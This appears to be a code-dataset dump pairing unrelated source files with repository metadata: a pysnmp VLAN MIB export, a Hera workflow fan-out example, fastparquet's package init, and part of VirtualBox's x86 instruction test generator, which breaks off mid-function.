mibBuilder.exportSymbols("SW-VLAN-MIB", marconi=marconi, swPortBaseVlanDefaultVlanEntry=swPortBaseVlanDefaultVlanEntry, swVlan=swVlan, swPortBaseVlanConfigTable=swPortBaseVlanConfigTable, golf=golf, swVlanCtrl=swVlanCtrl, swMacBaseVlanAddrEntry=swMacBaseVlanAddrEntry, swPortBaseVlanDefaultDesc=swPortBaseVlanDefaultDesc, swMacBaseVlanAddr=swMacBaseVlanAddr, swMacBaseVlanMacMember=swMacBaseVlanMacMember, swPortBaseVlanConfigPortNumber=swPortBaseVlanConfigPortNumber, swPortBaseVlanDefaultVlanTable=swPortBaseVlanDefaultVlanTable, swPortBaseVlan=swPortBaseVlan, swMacBaseVlanAddrMaxNum=swMacBaseVlanAddrMaxNum, swL2Mgmt=swL2Mgmt, dlinkcommon=dlinkcommon, swPortBaseVlanConfigEntry=swPortBaseVlanConfigEntry, swPortBaseVlanConfigPortList=swPortBaseVlanConfigPortList, swVlanSnmpPortVlan=swVlanSnmpPortVlan, swMacBaseVlanCtrlState=swMacBaseVlanCtrlState, PortList=PortList, external=external, swMacBaseVlanAddrStatus=swMacBaseVlanAddrStatus, swPortBaseVlanTotalNum=swPortBaseVlanTotalNum, swMacBaseVlan=swMacBaseVlan, swVlanInfoStatus=swVlanInfoStatus, swMacBaseVlanDesc=swMacBaseVlanDesc, swPortBaseVlanDefaultPvid=swPortBaseVlanDefaultPvid, dlink=dlink, MacAddress=MacAddress, swVlanCtrlMode=swVlanCtrlMode, golfproducts=golfproducts, systems=systems, swMacBaseVlanCtrlTable=swMacBaseVlanCtrlTable, swMacBaseVlanAddrVlanDesc=swMacBaseVlanAddrVlanDesc, marconi_mgmt=marconi_mgmt, swMacBaseVlanMaxNum=swMacBaseVlanMaxNum, swMacBaseVlanCtrlEntry=swMacBaseVlanCtrlEntry, swPortBaseVlanDefaultPortList=swPortBaseVlanDefaultPortList, swMacBaseVlanAddrTable=swMacBaseVlanAddrTable, swPortBaseVlanConfigPvid=swPortBaseVlanConfigPvid, swPortBaseVlanConfigDesc=swPortBaseVlanConfigDesc, VlanIndex=VlanIndex, swPortBaseVlanDefaultPortNumber=swPortBaseVlanDefaultPortNumber, golfcommon=golfcommon, swMacBaseVlanAddrState=swMacBaseVlanAddrState, es2000Mgmt=es2000Mgmt, es2000=es2000, swMacBaseVlanInfo=swMacBaseVlanInfo)
| 143.507692
| 1,908
| 0.767206
| 340
| 0.018225
| 0
| 0
| 0
| 0
| 0
| 0
| 6,241
| 0.33453
|
3696c582aaf438a2c947387898295abd07a07bfe
| 1,007
|
py
|
Python
|
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
from hera import (
InputArtifact,
InputFrom,
OutputArtifact,
Task,
Workflow,
WorkflowService,
)
def writer():
    """Write the integers 0..9 as JSON values, one per line, to /file."""
    import json

    body = ''.join(json.dumps(value) + '\n' for value in range(10))
    with open('/file', 'w+') as sink:
        sink.write(body)
def fanout():
    """Read /file line by line and dump a JSON fan-out list to stdout.

    Each element is {'i': <line>}; readlines() keeps the trailing newline
    on every line, so the values carry it too.
    """
    import json
    import sys

    with open('/file', 'r') as source:
        entries = [{'i': line} for line in source.readlines()]
    json.dump(entries, sys.stdout)
def consumer(i: int):
    """Consume one fan-out element: print the received index value."""
    print(i)
# Assemble and submit the workflow: writer >> fanout >> consumer.
ws = WorkflowService(host='https://my-argo-server.com', token='my-auth-token')
w = Workflow('artifact-with-fanout', ws)
# 'writer' exposes /file as an output artifact named 'test'.
w_t = Task('writer', writer, output_artifacts=[OutputArtifact(name='test', path='/file')])
# 'fanout' mounts the writer's 'test' artifact back at /file.
f_t = Task(
    'fanout',
    fanout,
    input_artifacts=[InputArtifact(from_task='writer', artifact_name='test', name='test', path='/file')],
)
# 'consumer' takes its 'i' parameter from the list emitted by 'fanout'.
c_t = Task('consumer', consumer, input_from=InputFrom(name='fanout', parameters=['i']))
w_t >> f_t >> c_t
w.add_tasks(w_t, f_t, c_t)
w.create()
| 21.891304
| 105
| 0.61569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.184707
|
3696d9a0ae665b8ea6b0dd59b9953426ce1a1124
| 424
|
py
|
Python
|
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
"""parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
# Package version string.  NOTE(review): presumably mirrors the release
# metadata in setup.py — confirm both are bumped together.
__version__ = "0.3.2"
| 28.266667
| 48
| 0.823113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.099057
|
36979d30250b5ace4c5161cd349e582790c807b4
| 96,838
|
py
|
Python
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 521
|
2019-03-29T15:44:08.000Z
|
2022-03-22T09:46:19.000Z
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 30
|
2019-06-04T17:00:49.000Z
|
2021-09-08T20:44:19.000Z
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 99
|
2019-03-29T16:04:13.000Z
|
2022-03-28T16:59:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: InstructionTestGen.py $
"""
Instruction Test Generator.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
"""
__version__ = "$Revision: 118412 $";
# pylint: disable=C0103,R0913
# Standard python imports.
import io;
import os;
from optparse import OptionParser
import random;
import sys;
## @name Exit codes
## @{
RTEXITCODE_SUCCESS = 0;
RTEXITCODE_SYNTAX = 2;
## @}
## @name Various C macros we're used to.
## @{
# Maximum values of the supported unsigned integer widths.
UINT8_MAX = 0xff
UINT16_MAX = 0xffff
UINT32_MAX = 0xffffffff
UINT64_MAX = 0xffffffffffffffff
def RT_BIT_32(iBit): # pylint: disable=C0103
    """ Returns a 32-bit value with only bit iBit set. """
    return 2 ** iBit;
def RT_BIT_64(iBit): # pylint: disable=C0103
    """ Returns a 64-bit value with only bit iBit set. """
    return 2 ** iBit;
## @}
## @name ModR/M
## @{
# Field masks and shifts for the ModR/M byte (mod:2, reg:3, rm:3).
X86_MODRM_RM_MASK = 0x07;
X86_MODRM_REG_MASK = 0x38;
X86_MODRM_REG_SMASK = 0x07;
X86_MODRM_REG_SHIFT = 3;
X86_MODRM_MOD_MASK = 0xc0;
X86_MODRM_MOD_SMASK = 0x03;
X86_MODRM_MOD_SHIFT = 6;
## @}
## @name SIB
## @{
# Field masks and shifts for the SIB byte (scale:2, index:3, base:3).
X86_SIB_BASE_MASK = 0x07;
X86_SIB_INDEX_MASK = 0x38;
X86_SIB_INDEX_SMASK = 0x07;
X86_SIB_INDEX_SHIFT = 3;
X86_SIB_SCALE_MASK = 0xc0;
X86_SIB_SCALE_SMASK = 0x03;
X86_SIB_SCALE_SHIFT = 6;
## @}
## @name Prefixes
## @{
# Legacy segment/size/lock/rep prefix bytes and REX prefix variants.
X86_OP_PRF_CS = 0x2e;
X86_OP_PRF_SS = 0x36;
X86_OP_PRF_DS = 0x3e;
X86_OP_PRF_ES = 0x26;
X86_OP_PRF_FS = 0x64;
X86_OP_PRF_GS = 0x65;
X86_OP_PRF_SIZE_OP = 0x66;
X86_OP_PRF_SIZE_ADDR = 0x67;
X86_OP_PRF_LOCK = 0xf0;
X86_OP_PRF_REPNZ = 0xf2;
X86_OP_PRF_REPZ = 0xf3;
X86_OP_REX_B = 0x41;
X86_OP_REX_X = 0x42;
X86_OP_REX_R = 0x44;
X86_OP_REX_W = 0x48;
## @}
## @name General registers
## @{
# Register indices as used in ModR/M/SIB encoding.
X86_GREG_xAX = 0
X86_GREG_xCX = 1
X86_GREG_xDX = 2
X86_GREG_xBX = 3
X86_GREG_xSP = 4
X86_GREG_xBP = 5
X86_GREG_xSI = 6
X86_GREG_xDI = 7
X86_GREG_x8 = 8
X86_GREG_x9 = 9
X86_GREG_x10 = 10
X86_GREG_x11 = 11
X86_GREG_x12 = 12
X86_GREG_x13 = 13
X86_GREG_x14 = 14
X86_GREG_x15 = 15
## @}
## @name Register names.
## @{
# Name tables indexed by register number; the *NoSp variants put None at the
# stack pointer slot so it can be skipped when picking scratch registers.
g_asGRegs64NoSp = ('rax', 'rcx', 'rdx', 'rbx', None, 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs64 = ('rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs32NoSp = ('eax', 'ecx', 'edx', 'ebx', None, 'ebp', 'esi', 'edi',
                   'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs32 = ('eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi',
               'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs16NoSp = ('ax', 'cx', 'dx', 'bx', None, 'bp', 'si', 'di',
                   'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs16 = ('ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di',
               'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs8 = ('al', 'cl', 'dl', 'bl', 'ah', 'ch', 'dh', 'bh');
# With a REX prefix: spl/bpl/sil/dil replace the high-byte registers, which
# are appended at indices 16..19.
g_asGRegs8Rex = ('al', 'cl', 'dl', 'bl', 'spl', 'bpl', 'sil', 'dil',
                 'r8b', 'r9b', 'r10b', 'r11b', 'r12b', 'r13b', 'r14b', 'r15b',
                 'ah', 'ch', 'dh', 'bh');
## @}
## @name EFLAGS/RFLAGS/EFLAGS
## @{
X86_EFL_CF = RT_BIT_32(0);
X86_EFL_CF_BIT = 0;
X86_EFL_1 = RT_BIT_32(1);
X86_EFL_PF = RT_BIT_32(2);
X86_EFL_AF = RT_BIT_32(4);
X86_EFL_AF_BIT = 4;
X86_EFL_ZF = RT_BIT_32(6);
X86_EFL_ZF_BIT = 6;
X86_EFL_SF = RT_BIT_32(7);
X86_EFL_SF_BIT = 7;
X86_EFL_TF = RT_BIT_32(8);
X86_EFL_IF = RT_BIT_32(9);
X86_EFL_DF = RT_BIT_32(10);
X86_EFL_OF = RT_BIT_32(11);
X86_EFL_OF_BIT = 11;
X86_EFL_IOPL = (RT_BIT_32(12) | RT_BIT_32(13));
X86_EFL_NT = RT_BIT_32(14);
X86_EFL_RF = RT_BIT_32(16);
X86_EFL_VM = RT_BIT_32(17);
X86_EFL_AC = RT_BIT_32(18);
X86_EFL_VIF = RT_BIT_32(19);
X86_EFL_VIP = RT_BIT_32(20);
X86_EFL_ID = RT_BIT_32(21);
X86_EFL_LIVE_MASK = 0x003f7fd5;
X86_EFL_RA1_MASK = RT_BIT_32(1);
X86_EFL_IOPL_SHIFT = 12;
# Union of the six arithmetic status flags (CF, PF, AF, ZF, SF, OF).
X86_EFL_STATUS_BITS = ( X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_ZF | X86_EFL_SF | X86_EFL_OF );
## @}
## @name Random
## @{
# Draw a 32-bit seed from the OS entropy pool.  The original idiom,
# int((os.urandom(4)).encode('hex'), 16), only works on Python 2 (bytes has
# no .encode() on Python 3); random.SystemRandom reads os.urandom internally
# and works on both, producing the same uniform 32-bit seed.
g_iMyRandSeed = random.SystemRandom().getrandbits(32);
#g_iMyRandSeed = 286523426;
#g_iMyRandSeed = 1994382324;
# Module-wide PRNG: deterministic for a given g_iMyRandSeed, so a run can be
# reproduced by hard-coding the seed above.
g_oMyRand = random.Random(g_iMyRandSeed);
#g_oMyRand = random.SystemRandom();
# All helpers below draw from g_oMyRand, so an entire run can be reproduced by
# fixing g_iMyRandSeed (see the commented-out seed assignments above).
def randU8():
    """ Unsigned 8-bit random number. """
    return g_oMyRand.getrandbits(8);
def randU16():
    """ Unsigned 16-bit random number. """
    return g_oMyRand.getrandbits(16);
def randU32():
    """ Unsigned 32-bit random number. """
    return g_oMyRand.getrandbits(32);
def randU64():
    """ Unsigned 64-bit random number. """
    return g_oMyRand.getrandbits(64);
def randUxx(cBits):
    """ Unsigned 8-, 16-, 32-, or 64-bit random number. """
    return g_oMyRand.getrandbits(cBits);
def randSxx(cBits):
    """ Signed 8-, 16-, 32-, or 64-bit random number. """
    # NOTE(review): this decodes the raw bits as sign-magnitude, not two's
    # complement: the top bit only flips the sign of the low cBits-1 bits.
    # Consequently -(2**(cBits-1)) is never produced and zero occurs with
    # double weight.  Presumably acceptable for generating test inputs —
    # confirm before reusing this helper elsewhere.
    uVal = randUxx(cBits);
    iRet = uVal & ((1 << (cBits - 1)) - 1);
    if iRet != uVal:
        iRet = -iRet;
    return iRet;
def randUxxList(cBits, cElements):
    """ Returns a list of cElements random cBits-wide unsigned numbers. """
    aiValues = [];
    for _ in range(cElements):
        aiValues.append(randUxx(cBits));
    return aiValues;
## @}
## @name Instruction Emitter Helpers
## @{
def calcRexPrefixForTwoModRmRegs(iReg, iRm, bOtherRexPrefixes = 0):
    """
    Computes the REX prefix byte required to encode the two given register
    indices, merged with any REX bits the caller already needs
    (bOtherRexPrefixes).  Returns an empty list when no REX byte is needed,
    otherwise a list containing the single prefix byte.
    """
    bRex = bOtherRexPrefixes \
         | (X86_OP_REX_R if iReg >= 8 else 0) \
         | (X86_OP_REX_B if iRm >= 8 else 0);
    return [] if bRex == 0 else [bRex,];
def calcModRmForTwoRegs(iReg, iRm):
    """
    Encodes a register-direct (mod = 11b) ModR/M byte for the given reg/rm
    register pair.  Returns a list containing the single byte.
    """
    bModRm  = X86_MODRM_MOD_MASK;                                   # mod = 11b, register direct.
    bModRm |= (iReg << X86_MODRM_REG_SHIFT) & X86_MODRM_REG_MASK;
    bModRm |= iRm & X86_MODRM_RM_MASK;
    return [bModRm,];
## @}
## @name Misc
## @{
def convU32ToSigned(u32):
    """ Converts a 32-bit unsigned value to 32-bit signed. """
    # Two's complement reinterpretation: keep the low 31 bits, subtract the
    # weight of the sign bit when it is set.
    return (u32 & 0x7fffffff) - (u32 & 0x80000000);
def rotateLeftUxx(cBits, uVal, cShift):
    """ Rotate a xx-bit wide unsigned number to the left. """
    assert cShift < cBits;
    assert cBits in (8, 16, 32, 64);
    uMask = (1 << cBits) - 1;
    uVal &= uMask;
    return ((uVal << cShift) | (uVal >> (cBits - cShift))) & uMask;
def rotateRightUxx(cBits, uVal, cShift):
    """ Rotate a xx-bit wide unsigned number to the right. """
    assert cShift < cBits;
    assert cBits in (8, 16, 32, 64);
    uMask = (1 << cBits) - 1;
    uVal &= uMask;
    return ((uVal >> cShift) | (uVal << (cBits - cShift))) & uMask;
def gregName(iReg, cBits, fRexByteRegs = True):
    """ Looks up the name of general register iReg at the given width (bits). """
    dWideTables = { 64: g_asGRegs64, 32: g_asGRegs32, 16: g_asGRegs16, };
    if cBits in dWideTables:
        return dWideTables[cBits][iReg];
    assert cBits == 8;
    asByteRegs = g_asGRegs8Rex if fRexByteRegs else g_asGRegs8;
    return asByteRegs[iReg];
## @}
class TargetEnv(object):
    """
    Target Runtime Environment.

    Bundles the instruction set (16/32/64-bit), CPU mode and privilege ring
    the generated test code targets, plus helpers for querying operand and
    address sizes and for picking general registers.
    """

    ## @name CPU Modes
    ## @{
    ksCpuMode_Real      = 'real';
    ksCpuMode_Protect   = 'prot';
    ksCpuMode_Paged     = 'paged';
    ksCpuMode_Long      = 'long';
    ksCpuMode_V86       = 'v86';
    ## @}

    ## @name Instruction set.
    ## @{
    ksInstrSet_16       = '16';
    ksInstrSet_32       = '32';
    ksInstrSet_64       = '64';
    ## @}

    def __init__(self, sName,
                 sInstrSet = ksInstrSet_32,
                 sCpuMode = ksCpuMode_Paged,
                 iRing = 3,
                 ):
        self.sName       = sName;
        self.sInstrSet   = sInstrSet;
        self.sCpuMode    = sCpuMode;
        self.iRing       = iRing;
        # Pre-resolved general register name tables for this environment.
        self.asGRegs     = g_asGRegs64     if self.is64Bit() else g_asGRegs32;
        self.asGRegsNoSp = g_asGRegs64NoSp if self.is64Bit() else g_asGRegs32NoSp;

    def isUsingIprt(self):
        """ Whether it's an IPRT environment or not. """
        return self.sName.startswith('iprt');

    def is64Bit(self):
        """ Whether it's a 64-bit environment or not. """
        return self.sInstrSet == self.ksInstrSet_64;

    def getDefOpBits(self):
        """ Get the default operand size as a bit count. """
        if self.sInstrSet == self.ksInstrSet_16:
            return 16;
        return 32;

    def getDefOpBytes(self):
        """ Get the default operand size as a byte count. """
        # Floor division so the byte count stays an int on Python 3 as well.
        return self.getDefOpBits() // 8;

    def getMaxOpBits(self):
        """ Get the max operand size as a bit count. """
        if self.sInstrSet == self.ksInstrSet_64:
            return 64;
        return 32;

    def getMaxOpBytes(self):
        """ Get the max operand size as a byte count. """
        return self.getMaxOpBits() // 8;

    def getDefAddrBits(self):
        """ Get the default address size as a bit count. """
        if self.sInstrSet == self.ksInstrSet_16:
            return 16;
        if self.sInstrSet == self.ksInstrSet_32:
            return 32;
        return 64;

    def getDefAddrBytes(self):
        """ Get the default address size as a byte count. """
        return self.getDefAddrBits() // 8;

    def getGRegCount(self, cbEffBytes = 4):
        """ Get the number of general registers. """
        if self.sInstrSet == self.ksInstrSet_64:
            if cbEffBytes == 1:
                return 16 + 4;          # Include the high byte regs (AH..BH).
            return 16;
        return 8;

    def randGRegNoSp(self, cbEffBytes = 4):
        """ Returns a random general register number, excluding the SP register. """
        iReg = randU16() % self.getGRegCount(cbEffBytes);
        while iReg == X86_GREG_xSP:
            iReg = randU16() % self.getGRegCount(cbEffBytes);
        return iReg;

    def randGRegNoSpList(self, cItems, cbEffBytes = 4):
        """ List of randGRegNoSp values. """
        aiRegs = [];
        for _ in range(cItems):
            aiRegs.append(self.randGRegNoSp(cbEffBytes));
        return aiRegs;

    def getAddrModes(self):
        """ Gets a list of addressing mode (16, 32, or/and 64), default mode first. """
        if self.sInstrSet == self.ksInstrSet_16:
            return [16, 32];
        if self.sInstrSet == self.ksInstrSet_32:
            return [32, 16];
        return [64, 32];

    def is8BitHighGReg(self, cbEffOp, iGReg):
        """ Checks if the given register is a high 8-bit general register (AH, CH, DH or BH). """
        assert cbEffOp in [1, 2, 4, 8];
        if cbEffOp == 1:
            if iGReg >= 16:             # 64-bit: AH..BH live at indices 16..19.
                return True;
            if iGReg >= 4 and not self.is64Bit():
                return True;
        return False;

    def gregNameBits(self, iReg, cBits):
        """ Gets the name of the given register for the specified width (bits). """
        return gregName(iReg, cBits, self.is64Bit());

    def gregNameBytes(self, iReg, cbWidth):
        """ Gets the name of the given register for the specified with (in bytes). """
        return gregName(iReg, cbWidth * 8, self.is64Bit());
## Target environments.
# Maps environment name -> TargetEnv configuration.  NOTE(review): presumably
# selected by name via the command line options elsewhere — confirm.
g_dTargetEnvs = {
    'iprt-r3-32': TargetEnv('iprt-r3-32', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 3),
    'iprt-r3-64': TargetEnv('iprt-r3-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 3),
    'bs2-r0-64': TargetEnv('bs2-r0-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
    'bs2-r0-64-big': TargetEnv('bs2-r0-64-big', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
    'bs2-r0-32-big': TargetEnv('bs2-r0-32-big', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 0),
};
class InstrTestBase(object):
    """
    Base class for testing one instruction.

    Concrete tests override generateTest() and can use generateInputs() to
    obtain a list of unsigned test values sized according to the selected
    test size option.
    """

    def __init__(self, sName, sInstr = None):
        """
        sName is the descriptive test name; sInstr is the instruction
        mnemonic, defaulting to the first word of sName.
        """
        self.sName = sName;
        self.sInstr = sInstr if sInstr else sName.split()[0];

    def isApplicable(self, oGen):
        """
        Tests if the instruction test is applicable to the selected environment.
        """
        _ = oGen;
        return True;

    def generateTest(self, oGen, sTestFnName):
        """
        Emits the test assembly code.
        """
        oGen.write(';; @todo not implemented. This is for the linter: %s, %s\n' % (oGen, sTestFnName));
        return True;

    def generateInputs(self, cbEffOp, cbMaxOp, oGen, fLong = False):
        """ Generate a list of inputs. """
        if fLong:
            #
            # Try do extremes as well as different ranges of random numbers.
            #
            # Note: floor division (//) keeps the boundary values integral on
            # Python 3 as well; plain '/' would yield floats there, producing
            # invalid (fractional) test operands.
            auRet = [0, 1, ];
            if cbMaxOp >= 1:
                auRet += [ UINT8_MAX // 2, UINT8_MAX // 2 + 1, UINT8_MAX ];
            if cbMaxOp >= 2:
                auRet += [ UINT16_MAX // 2, UINT16_MAX // 2 + 1, UINT16_MAX ];
            if cbMaxOp >= 4:
                auRet += [ UINT32_MAX // 2, UINT32_MAX // 2 + 1, UINT32_MAX ];
            if cbMaxOp >= 8:
                auRet += [ UINT64_MAX // 2, UINT64_MAX // 2 + 1, UINT64_MAX ];

            # Top up with random values until the quota for the selected test
            # size is reached.
            if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
                for cBits, cValues in ( (8, 4), (16, 4), (32, 8), (64, 8) ):
                    if cBits < cbMaxOp * 8:
                        auRet += randUxxList(cBits, cValues);
                cWanted = 16;
            elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
                for cBits, cValues in ( (8, 8), (16, 8), (24, 2), (32, 16), (40, 1), (48, 1), (56, 1), (64, 16) ):
                    if cBits < cbMaxOp * 8:
                        auRet += randUxxList(cBits, cValues);
                cWanted = 64;
            else:
                for cBits, cValues in ( (8, 16), (16, 16), (24, 4), (32, 64), (40, 4), (48, 4), (56, 4), (64, 64) ):
                    if cBits < cbMaxOp * 8:
                        auRet += randUxxList(cBits, cValues);
                cWanted = 168;
            if len(auRet) < cWanted:
                auRet += randUxxList(cbEffOp * 8, cWanted - len(auRet));
        else:
            #
            # Short list, just do some random numbers.
            #
            auRet = [];
            if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
                auRet += randUxxList(cbMaxOp, 1);
            elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
                auRet += randUxxList(cbMaxOp, 2);
            else:
                auRet = [];
                for cBits in (8, 16, 32, 64):
                    if cBits < cbMaxOp * 8:
                        auRet += randUxxList(cBits, 1);
        return auRet;
class InstrTest_MemOrGreg_2_Greg(InstrTestBase):
    """
    Instruction reading memory or general register and writing the result to a
    general register.
    """
    def __init__(self, sName, fnCalcResult, sInstr = None, acbOpVars = None):
        InstrTestBase.__init__(self, sName, sInstr);
        self.fnCalcResult = fnCalcResult;   # Computes the expected result: (cbEffOp, uInput, uCur, oGen) -> int.
        self.acbOpVars = [ 1, 2, 4, 8 ] if not acbOpVars else list(acbOpVars);  # Operand sizes (bytes) to test.
        self.fTestRegForm = True;           # Generate reg,reg form tests.
        self.fTestMemForm = True;           # Generate reg,mem form tests.
    ## @name Test Instruction Writers
    ## @{
    def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
        """ Writes the instruction with two general registers as operands. """
        oGen.write(' %s %s, %s\n'
                   % ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
        return True;
    def writeInstrGregPureRM(self, cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen):
        """ Writes the instruction with a general register and a pure R/M (memory) operand. """
        oGen.write(' ');
        if iOp2 == 13 and iMod == 0 and cAddrBits == 64:
            oGen.write('altrexb '); # Alternative encoding for rip relative addressing.
        oGen.write('%s %s, [' % (self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),));
        if (iOp2 == 5 or iOp2 == 13) and iMod == 0:
            # R/M 5 and 13 with mod 0 is disp32 (or rip-relative in 64-bit mode).
            oGen.write('VBINSTST_NAME(g_u%sData)' % (cbEffOp * 8,))
            if oGen.oTarget.is64Bit():
                oGen.write(' wrt rip');
        else:
            if iMod == 1:
                oGen.write('byte %d + ' % (offDisp,));
            elif iMod == 2:
                oGen.write('dword %d + ' % (offDisp,));
            else:
                assert iMod == 0;
            if cAddrBits == 64:
                oGen.write(g_asGRegs64[iOp2]);
            elif cAddrBits == 32:
                oGen.write(g_asGRegs32[iOp2]);
            elif cAddrBits == 16:
                assert False; ## @todo implement 16-bit addressing.
            else:
                assert False, str(cAddrBits);
        oGen.write(']\n');
        return True;
    def writeInstrGregSibLabel(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
        """ Writes the instruction taking a register and a label (base only w/o reg), SIB form. """
        assert offDisp is None; assert iBaseReg in [5, 13]; assert iIndexReg == 4; assert cAddrBits != 16;
        if cAddrBits == 64:
            # Note! Cannot test this in 64-bit mode in any sensible way because the disp is 32-bit
            # and we cannot (yet) make assumptions about where we're loaded.
            ## @todo Enable testing this in environments where we can make assumptions (boot sector).
            oGen.write(' %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP]\n'
                       % ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8,));
        else:
            oGen.write(' altsibx%u %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP] ; iOp1=%s cbEffOp=%s\n'
                       % ( iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8, iOp1, cbEffOp));
        return True;
    def writeInstrGregSibScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
        """ Writes the instruction taking a register and disp+scaled register (no base reg), SIB form. """
        assert iBaseReg in [5, 13]; assert iIndexReg != 4; assert cAddrBits != 16;
        # Note! Using altsibxN to force scaled encoding. This is only really a
        # necessity for iScale=1, but doesn't hurt for the rest.
        oGen.write(' altsibx%u %s %s, [%s * %#x'
                   % (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
        if offDisp is not None:
            oGen.write(' + %#x' % (offDisp,));
        oGen.write(']\n');
        _ = iBaseReg;
        return True;
    def writeInstrGregSibBase(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
        """ Writes the instruction taking a register and base only (with reg), SIB form. """
        oGen.write(' altsibx%u %s %s, [%s'
                   % (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iBaseReg, cAddrBits),));
        if offDisp is not None:
            oGen.write(' + %#x' % (offDisp,));
        oGen.write(']\n');
        _ = iIndexReg;
        return True;
    def writeInstrGregSibBaseAndScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
        """ Writes the instruction taking a register and full featured SIB form address. """
        # Note! From the looks of things, yasm will encode the following instructions the same way:
        #           mov eax, [rsi*1 + rbx]
        #           mov eax, [rbx + rsi*1]
        # So, when there are two registers involved, the '*1' selects
        # which is index and which is base.
        oGen.write(' %s %s, [%s + %s * %u'
                   % ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),
                       oGen.gregNameBits(iBaseReg, cAddrBits), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
        if offDisp is not None:
            oGen.write(' + %#x' % (offDisp,));
        oGen.write(']\n');
        return True;
    ## @}
    ## @name Memory setups
    ## @{
    def generateMemSetupReadByLabel(self, oGen, cbEffOp, uInput):
        """ Sets up memory for a memory read. """
        oGen.pushConst(uInput);
        oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
        return True;
    def generateMemSetupReadByReg(self, oGen, cAddrBits, cbEffOp, iReg1, uInput, offDisp = None):
        """ Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
        oGen.pushConst(uInput);
        oGen.write(' call VBINSTST_NAME(%s)\n'
